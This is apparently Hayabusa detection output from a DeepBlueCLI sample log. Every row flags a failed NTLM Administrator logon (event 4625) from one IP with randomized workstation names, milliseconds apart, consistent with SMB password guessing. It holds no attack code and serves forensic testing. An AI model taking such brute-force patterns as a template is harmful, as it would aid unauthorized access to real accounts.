2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DmrbO3dZw46DgmZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qg4CMwLpfzLrvDPj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKDKUXNNhuSqRiTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cBocrjNXjmuPCKRJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: loCrAXibgVxcOtCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZ7pHOJeOExrON2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MeucKpaodpmdsqhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LRlmBeBlV6n4MQyo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8FYOF6HxJHqm7GW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9tBtz1GYn5J8sbFH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qn8PlxEzIu9AKUgt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdjqlNDU3U150UAw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esaTfuwuiFAkIVs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y4LbVQ5ytgVCqFmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rWoX76sgYTVwxkD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQFJRRYn6sjYK5cD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wyVuBGEFGJqImQ7W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pRvnyVGxG8i0e3PQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X6Hv2fj43a8j1O2P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: myP4zVFyw2qE1SV7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lpmBcVilH72dYF7E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jd9hKGDxLcnZphlL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OmXgOD9kaGJ4PIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BpQtWW0fAEzNH28B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EgNkY8LKSWcnLM00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8S1dUwb3HjOnEs9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49ZKcnswdISJDwbS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qOuYmww71pTM0l3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PUHoGgmXKRJknRZG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6yf8LSkcwBP9s1mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmH2AMDmkZVbCt8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I23o9EQLpPpn9RlY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrEVj3DB1prpOtnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Iau1IHKxWRsqQaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdPC9LVhZS2l27XF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxcofRpjCFme3mg2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e1VnQLbETh1GgX0c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbdPYXx8mx4SV9G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcv3HWid3auIu7cY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2OviUvdOmk5HON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bVBSORhgFwTy2TWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DsIhCEZcfYenufvf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDadVFtE4toNiagy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnydJjDBdzJWqmWa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW8im2IhNzrGoSFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTzlqq9HLEX6wzdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz98aGXd0fdVzmTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2zOy64cp6dXelNl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X1BflxNjQRNopjb4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 401ulFeuzCtp5lPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p0SIzJrzkseFB1j8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cyQMxtEdbud8iJLI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gbjIqxD4E6fYsGx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEeZEcj63sBddCsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiATfqYtrH9LoqR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PG3HB3GqFwQFLdcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G8NU6WRdrq9DxM6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cvZKIkI2aeBzbwe0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EE7AL3nJ7qsnk4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feu34D0VvoMrnWzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrNRIpCpmAV3npax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zpxgEvvoC0stFdTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XvpDKRAPDS36sqNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4cqJKEIySxiQdCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm1F7QEwBE054ui0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvIjhyfdlXiX72Es : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJilW4KgIEeh5VNr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Ka0FYYdVOj90l0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9ZjGE8T6RuGx8SZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkti4BGVrpoAQRBL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZy2YJPOg1YZ2bd0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUE6E9H9i0l0P7Jp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Pkpt2nmRorQ3x0o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCZNNzSyi4mLLaxZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O9ZqF43sDjSirvMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
